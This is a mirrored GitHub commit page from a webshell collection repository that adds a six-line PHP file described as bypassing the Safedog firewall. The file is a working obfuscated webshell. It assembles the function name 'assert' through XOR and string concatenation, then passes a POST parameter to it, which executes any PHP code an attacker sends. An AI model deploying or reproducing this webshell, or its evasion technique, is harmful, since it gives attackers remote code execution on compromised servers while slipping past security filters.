1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00

Create 2020.08.20.19.php

bypass by safedog
https://www.sqlsec.com/2020/07/shell.html
This commit is contained in:
tennc
2020-08-20 13:09:52 +08:00
committed by GitHub
parent 12ad35eb0f
commit cbd7b8ef98

6
php/2020.08.20.19.php Normal file
View File

@@ -0,0 +1,6 @@
<?php
$a = ('!'^'@').'s'.'s'.'e'.'r'.'t';
$b='_'.'P'.'O'.'S'.'T';
$c=$$b;
$a($c['x']);
?>